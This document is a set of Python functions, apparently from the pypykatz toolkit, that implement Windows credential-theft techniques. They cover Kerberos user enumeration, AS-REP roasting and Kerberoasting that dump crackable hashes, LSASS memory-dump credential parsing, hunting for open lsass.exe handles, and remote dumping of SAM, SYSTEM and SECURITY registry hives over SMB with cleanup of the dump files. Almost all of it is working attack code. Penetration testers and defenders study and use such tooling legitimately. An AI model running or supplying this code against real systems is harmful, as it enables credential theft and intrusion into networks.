async def brute(host, targets, out_file=None, show_negatives=False): """ targets List<KerberosSPN> """ try: logger.debug('[KERBEROS][BRUTE] User enumeration starting') target = KerberosTarget(host) for spn in targets: ke = KerberosUserEnum(target, spn) result = await ke.run() if result is True: if out_file: with open(out_file, 'a') as f: f.write(result + '\r\n') else: print('[+] %s' % str(spn)) else: if show_negatives is True: print('[-] %s' % str(spn)) logger.info('[KERBEROS][BRUTE] User enumeration finished') return None, None except Exception as e: return None, e
def run(self): self.result_process = LGResProc(self.outQ, out_file=self.out_file, to_json=self.to_json) self.result_process.daemon = True self.result_process.start() for i in range(self.agent_proccnt): p = LocalGroupEnumProc(self.inQ, self.outQ, self.agent_threadcnt, groups=self.groups, timeout=self.timeout, pre_check=self.pre_check) p.daemon = True p.start() self.agents.append(p) logger.info('=== Enumerating local groups ===') for t in self.hosts: self.inQ.put(t) for a in self.agents: for i in range(self.agent_threadcnt): self.inQ.put(None) for a in self.agents: a.join() self.outQ.put(None) self.result_process.join()
async def asreproast(host, targets, out_file=None, etype=23): """ targets List<KerberosSPN> """ try: logger.debug('[KERBEROS][ASREPROAST] Roasting...') logger.debug( '[KERBEROS][ASREPROAST] Supporting the following encryption type: %s' % (str(etype))) ks = KerberosTarget(host) ar = APREPRoast(ks) hashes = [] for target in targets: h = await ar.run(target, override_etype=[etype]) hashes.append(h) if out_file: with open(out_file, 'a', newline='') as f: for thash in hashes: f.write(thash + '\r\n') else: print(h) logger.info('[KERBEROS][ASREPROAST] Done!') return hashes, None except Exception as e: return None, e
def kirbi_to_ccache(ccachefile, kirbi): try: cc = CCACHE.from_file(ccachefile) except FileNotFoundError: cc = CCACHE() abs_path = os.path.abspath(kirbi) if os.path.isdir(abs_path): logger.info('Parsing kirbi files in directory %s' % abs_path) for kirbifile in glob.glob(kirbi + '*.kirbi'): cc.add_kirbi(kirbifile) else: cc.add_kirbi(kirbi) cc.to_file(ccachefile)
def parse_minidump_file(filename, rdp_module, chunksize = 10*1024): try: minidump = MinidumpFile.parse(filename) reader = minidump.get_reader().get_buffered_reader(segment_chunk_size=chunksize) sysinfo = KatzSystemInfo.from_minidump(minidump) except Exception as e: logger.exception('Minidump parsing error!') raise e try: mimi = RDPCredParser(None, reader, sysinfo, rdp_module) mimi.start() except Exception as e: logger.info('Credentials parsing error!') raise e return [mimi]
def get_lsa_bruteforce(self): #good luck! logger.info('Testing all available templates! Expect warnings!') for lsa_dec_template in LsaTemplate.get_template_brute(self.sysinfo): try: lsa_dec = LsaDecryptor.choose(self.reader, lsa_dec_template, self.sysinfo) logger.debug(lsa_dec.dump()) except: pass else: logger.info( 'Lucky you! Brutefoce method found a -probably- working template!' ) return lsa_dec
def run(self): self.setup() while True: result = self.outQ.get() if not result: break target, groupname, group = result if self.to_json is True: if target not in self.results: self.results[target] = [] self.results[target].append([groupname, group.to_dict()]) else: result = '%s %s %s %s %s' % (target, groupname, group.domain, group.username, str(group.sid)) if self.out_file is not None: if target not in self.results: self.results[target] = [] self.results[target].append(result) else: print(result) if self.out_file is None and self.to_json is False: return logger.info('Writing results...') if self.out_file is not None: with open(self.out_file, 'w', newline='') as f: if self.to_json is True: f.write( json.dumps(self.results, cls=UniversalEncoder, indent=4, sort_keys=True)) else: for target in self.results: for res in self.results[target]: f.write('%s %s\r\n' % (target, res)) else: print( json.dumps(self.results, cls=UniversalEncoder, indent=4, sort_keys=True))
def del_ccache(ccachefile, index): output_filename = os.path.join( os.path.dirname(os.path.abspath(ccachefile)), '%s.edited.ccache' % ntpath.basename(ccachefile)) #sorry for this, im tired now :( cc = CCACHE.from_file(ccachefile) temp_cc = CCACHE() temp_cc.file_format_version = cc.file_format_version temp_cc.headerlen = cc.headerlen temp_cc.headers = cc.headers temp_cc.primary_principal = cc.primary_principal for i, cred in enumerate(cc.credentials): if i == index: continue temp_cc.credentials.append(cred) logger.info('Writing edited file to %s' % output_filename) temp_cc.to_file(output_filename)
def enum_lsass_handles(): #searches for open LSASS process handles in all processes # you should be having SE_DEBUG enabled at this point RtlAdjustPrivilege(20) lsass_handles = [] sysinfohandles = NtQuerySystemInformation(16) for pid in sysinfohandles: if pid == 4: continue #if pid != GetCurrentProcessId(): # continue for syshandle in sysinfohandles[pid]: #print(pid) try: pHandle = OpenProcess(PROCESS_DUP_HANDLE, False, pid) except Exception as e: logger.debug('Error opening process %s Reason: %s' % (pid, e)) continue try: dupHandle = NtDuplicateObject(pHandle, syshandle.Handle, GetCurrentProcess(), PROCESS_QUERY_INFORMATION|PROCESS_VM_READ) #print(dupHandle) except Exception as e: logger.debug('Failed to duplicate object! PID: %s HANDLE: %s' % (pid, hex(syshandle.Handle))) continue oinfo = NtQueryObject(dupHandle, ObjectTypeInformation) if oinfo.Name.getString() == 'Process': try: pname = QueryFullProcessImageNameW(dupHandle) if pname.lower().find('lsass.exe') != -1: logger.info('Found open handle to lsass! PID: %s HANDLE: %s' % (pid, hex(syshandle.Handle))) #print('%s : %s' % (pid, pname)) lsass_handles.append((pid, dupHandle)) except Exception as e: logger.debug('Failed to obtain the path of the process! PID: %s' % pid) continue return lsass_handles
def run(self, args): files_with_error = [] results = {} ###### Rekall if args.cmd == 'rekall': if args.kerberos_dir is not None and 'all' not in args.packages: args.packages.append('ktickets') mimi = pypykatz.parse_memory_dump_rekall(args.memoryfile, args.timestamp_override, packages=args.packages) results['rekall'] = mimi ###### Minidump elif args.cmd == 'minidump': if args.directory: dir_fullpath = os.path.abspath(args.memoryfile) file_pattern = '*.dmp' if args.recursive == True: globdata = os.path.join(dir_fullpath, '**', file_pattern) else: globdata = os.path.join(dir_fullpath, file_pattern) logger.info('Parsing folder %s' % dir_fullpath) for filename in glob.glob(globdata, recursive=args.recursive): logger.info('Parsing file %s' % filename) try: if args.kerberos_dir is not None and 'all' not in args.packages: args.packages.append('ktickets') mimi = pypykatz.parse_minidump_file( filename, packages=args.packages) results[filename] = mimi if args.halt_on_error == True and len(mimi.errors) > 0: raise Exception('Error in modules!') except Exception as e: files_with_error.append(filename) logger.exception('Error parsing file %s ' % filename) if args.halt_on_error == True: raise e else: pass else: logger.info('Parsing file %s' % args.memoryfile) try: if args.kerberos_dir is not None and 'all' not in args.packages: args.packages.append('ktickets') mimi = pypykatz.parse_minidump_file(args.memoryfile, packages=args.packages) results[args.memoryfile] = mimi if args.halt_on_error == True and len(mimi.errors) > 0: raise Exception('Error in modules!') except Exception as e: logger.exception('Error while parsing file %s' % args.memoryfile) if args.halt_on_error == True: raise e else: traceback.print_exc() self.process_results(results, files_with_error, args)
async def spnroast(url, targets, out_file=None, etype=23): """ targets List<KerberosSPN> """ try: logger.debug('[KERBEROS][SPNROAST] Roasting...') if etype: if etype == -1: etypes = [23, 17, 18] else: etypes = [etype] else: etypes = [23, 17, 18] logger.debug( '[KERBEROS][SPNROAST] Using the following encryption type(s): %s' % (','.join(str(x) for x in etypes))) ku = KerberosClientURL.from_url(url) cred = ku.get_creds() target = ku.get_target() ar = Kerberoast(target, cred) hashes = await ar.run(targets, override_etype=etypes) if out_file: with open(out_file, 'w', newline='') as f: for thash in hashes: f.write(thash + '\r\n') else: for thash in hashes: print(thash) logger.info('[KERBEROS][SPNROAST] Done!') return hashes, None except Exception as e: return None, e
async def run(self, args): files_with_error = [] results = {} ###### Minidump if args.cmd == 'minidump': if args.directory: dir_fullpath = os.path.abspath(args.memoryfile) file_pattern = '*.dmp' if args.recursive == True: globdata = os.path.join(dir_fullpath, '**', file_pattern) else: globdata = os.path.join(dir_fullpath, file_pattern) logger.info('Parsing folder %s' % dir_fullpath) for filename in glob.glob(globdata, recursive=args.recursive): logger.info('Parsing file %s' % filename) try: mimi = await apypykatz.parse_minidump_file( filename, packages=args.packages) results[filename] = mimi except Exception as e: files_with_error.append(filename) logger.exception('Error parsing file %s ' % filename) if args.halt_on_error == True: raise e else: pass else: logger.info('Parsing file %s' % args.memoryfile) try: mimi = await apypykatz.parse_minidump_file( args.memoryfile, packages=args.packages) results[args.memoryfile] = mimi except Exception as e: logger.exception('Error while parsing file %s' % args.memoryfile) if args.halt_on_error == True: raise e else: traceback.print_exc() self.process_results(results, files_with_error, args)
def log_basic_info(self): """ In case of error, please attach this to the issues page """ logger.info('===== BASIC INFO. SUBMIT THIS IF THERE IS AN ISSUE =====') logger.info('pypyKatz version: %s' % __version__) logger.info('CPU arch: %s' % self.sysinfo.architecture.name) logger.info('OS: %s' % self.sysinfo.operating_system) logger.info('BuildNumber: %s' % self.sysinfo.buildnumber) logger.info('MajorVersion: %s ' % self.sysinfo.major_version) logger.info('MSV timestamp: %s' % self.sysinfo.msv_dll_timestamp) logger.info('===== BASIC INFO END =====')
def process_results(self, results, files_with_error, args): if args.outfile and args.json: with open(args.outfile, 'w') as f: json.dump(results, f, cls=UniversalEncoder, indent=4, sort_keys=True) elif args.outfile and args.grep: with open(args.outfile, 'w', newline='') as f: f.write(':'.join(LogonSession.grep_header) + '\r\n') for result in results: for luid in results[result].logon_sessions: for row in results[result].logon_sessions[ luid].to_grep_rows(): f.write(':'.join(row) + '\r\n') elif args.outfile: with open(args.outfile, 'w') as f: for result in results: f.write('FILE: ======== %s =======\n' % result) for luid in results[result].logon_sessions: f.write('\n' + str(results[result].logon_sessions[luid])) if len(results[result].orphaned_creds) > 0: f.write('\n== Orphaned credentials ==\n') for cred in results[result].orphaned_creds: f.write(str(cred)) if len(files_with_error) > 0: f.write('\n== Failed to parse these files:\n') for filename in files_with_error: f.write('%s\n' % filename) elif args.json: print( json.dumps(results, cls=UniversalEncoder, indent=4, sort_keys=True)) elif args.grep: if hasattr(args, 'directory') and args.directory is not None: print(':'.join(['filename'] + LogonSession.grep_header)) else: print(':'.join(LogonSession.grep_header)) for result in results: for luid in results[result].logon_sessions: for row in results[result].logon_sessions[ luid].to_grep_rows(): if hasattr(args, 'directory') and args.directory is not None: row = [result] + row print(':'.join(row)) for cred in results[result].orphaned_creds: t = cred.to_dict() if t['credtype'] != 'dpapi': if t['password'] is not None: x = [ str(t['credtype']), str(t['domainname']), str(t['username']), '', '', '', '', '', str(t['password']) ] if hasattr(args, 'directory' ) and args.directory is not None: x = [result] + x print(':'.join(x)) else: t = cred.to_dict() x = [ str(t['credtype']), '', '', '', '', '', str(t['masterkey']), str(t['sha1_masterkey']), str(t['key_guid']), '' ] if hasattr(args, 'directory') and args.directory is not None: x = [result] + x print(':'.join(x)) for pkg, err in results[result].errors: err_str = str(err) + '\r\n' + '\r\n'.join( traceback.format_tb(err.__traceback__)) err_str = base64.b64encode(err_str.encode()).decode() x = [ pkg + '_exception_please_report', '', '', '', '', '', '', '', '', err_str ] if hasattr(args, 'directory') and args.directory is not None: x = [result] + x print(':'.join(x) + '\r\n') else: for result in results: print('FILE: ======== %s =======' % result) if isinstance(results[result], str): print(results[result]) else: for luid in results[result].logon_sessions: print(str(results[result].logon_sessions[luid])) if len(results[result].orphaned_creds) > 0: print('== Orphaned credentials ==') for cred in results[result].orphaned_creds: print(str(cred)) if len(results[result].errors) > 0: print('== Errors ==') for pkg, err in results[result].errors: err_str = str(err) + '\r\n' + '\r\n'.join( traceback.format_tb(err.__traceback__)) logger.debug(err_str) err_str = base64.b64encode( err_str.encode()).decode() print('%s %s' % (pkg + '_exception_please_report', err_str)) if len(files_with_error) > 0: print('\n==== Parsing errors:') for filename in files_with_error: print(filename) if args.kerberos_dir: dir = os.path.abspath(args.kerberos_dir) logger.info('Writing kerberos tickets to %s' % dir) for filename in results: base_filename = ntpath.basename(filename) ccache_filename = '%s_%s.ccache' % ( base_filename, os.urandom(4).hex()) #to avoid collisions results[filename].kerberos_ccache.to_file( os.path.join(dir, ccache_filename)) for luid in results[filename].logon_sessions: for kcred in results[filename].logon_sessions[ luid].kerberos_creds: for ticket in kcred.tickets: ticket.to_kirbi(dir) for cred in results[filename].orphaned_creds: if cred.credtype == 'kerberos': for ticket in cred.tickets: ticket.to_kirbi(dir)
async def regdump_single(targetid, connection, hives=['HKLM\\SAM', 'HKLM\\SYSTEM', 'HKLM\\SECURITY'], remote_base_path='C:\\Windows\\Temp\\', remote_share_name='\\c$\\Windows\\Temp\\', enable_wait=3): try: from aiosmb.commons.interfaces.machine import SMBMachine from aiosmb.commons.interfaces.file import SMBFile from aiosmb.dcerpc.v5.common.service import SMBServiceStatus from pypykatz.alsadecryptor.asbmfile import SMBFileReader from pypykatz.registry.aoffline_parser import OffineRegistry if remote_base_path.endswith('\\') is False: remote_base_path += '\\' if remote_share_name.endswith('\\') is False: remote_share_name += '\\' po = None async with connection: logger.debug('[REGDUMP] Connecting to server...') _, err = await connection.login() if err is not None: raise err logger.debug('[REGDUMP] Connected to server!') async with SMBMachine(connection) as machine: logger.debug( '[REGDUMP] Checking remote registry service status...') status, err = await machine.check_service_status( 'RemoteRegistry') if err is not None: raise err logger.debug('[REGDUMP] Remote registry service status: %s' % status.name) if status != SMBServiceStatus.RUNNING: logger.debug('[REGDUMP] Enabling Remote registry service') _, err = await machine.enable_service('RemoteRegistry') if err is not None: raise err logger.debug('[REGDUMP] Starting Remote registry service') _, err = await machine.start_service('RemoteRegistry') if err is not None: raise err await asyncio.sleep(enable_wait) logger.debug( '[REGDUMP] Remote registry service should be running now...' ) files = {} for hive in hives: fname = '%s.%s' % (os.urandom(4).hex(), os.urandom(3).hex()) remote_path = remote_base_path + fname remote_sharepath = remote_share_name + fname remote_file = SMBFileReader( SMBFile.from_remotepath(connection, remote_sharepath)) files[hive.split('\\')[1].upper()] = remote_file logger.info('[REGDUMP] Dumping reghive %s to (remote) %s' % (hive, remote_path)) _, err = await machine.save_registry_hive( hive, remote_path) if err is not None: raise err #await asyncio.sleep(1) for rfilename in files: rfile = files[rfilename] logger.debug('[REGDUMP] Opening reghive file %s' % rfilename) _, err = await rfile.open(connection) if err is not None: raise err try: logger.debug('[REGDUMP] Parsing hives...') po = await OffineRegistry.from_async_reader( files['SYSTEM'], sam_reader=files.get('SAM'), security_reader=files.get('SECURITY'), software_reader=files.get('SOFTWARE')) except Exception as e: print(e) logger.debug('[REGDUMP] Hives parsed OK!') logger.debug('[REGDUMP] Deleting remote files...') err = None for rfilename in files: rfile = files[rfilename] err = await rfile.close() if err is not None: logger.info( '[REGDUMP] ERR! Failed to close hive dump file! %s' % rfilename) _, err = await rfile.delete() if err is not None: logger.info( '[REGDUMP] ERR! Failed to delete hive dump file! %s' % rfilename) if err is None: logger.info('[REGDUMP] Deleting remote files OK!') return targetid, po, None except Exception as e: return targetid, None, e
def run(self): self.setup() while True: result = self.outQ.get() if not result: break target, share, err = result if err is not None: if self.to_json is False and self.out_file is None: print('%s : %s' % (target, str(err))) else: self.errors[target] = err continue if self.to_json is True: if target not in self.results: self.results[target] = [] self.results[target].append(share.to_dict()) else: result = '%s %s %s %s %s' % (target, share.netname, share.type, share.remark, share.passwd) if self.out_file is not None: if target not in self.results: self.results[target] = [] self.results[target].append(result) else: print(result) if self.out_file is None and self.to_json is False: #print already heppened return logger.info('Writing results...') if self.out_file is not None: with open(self.out_file, 'w', newline='') as f: if self.to_json is True: f.write( json.dumps( { 'results': self.results, 'errors': self.errors }, cls=UniversalEncoder, indent=4, sort_keys=True)) else: for target in self.results: for res in self.results[target]: f.write('%s %s\r\n' % (target, res)) for target in self.errors: f.write('%s %s\r\n' % (target, self.errors[target])) else: print( json.dumps({ 'results': self.results, 'errors': self.errors }, cls=UniversalEncoder, indent=4, sort_keys=True))
def ccache_to_kirbi(ccachefile, kirbidir): cc = CCACHE.from_file(ccachefile) logger.info('Extracting kirbi file(s)') cc.to_kirbidir(kirbidir) logger.info('Done!')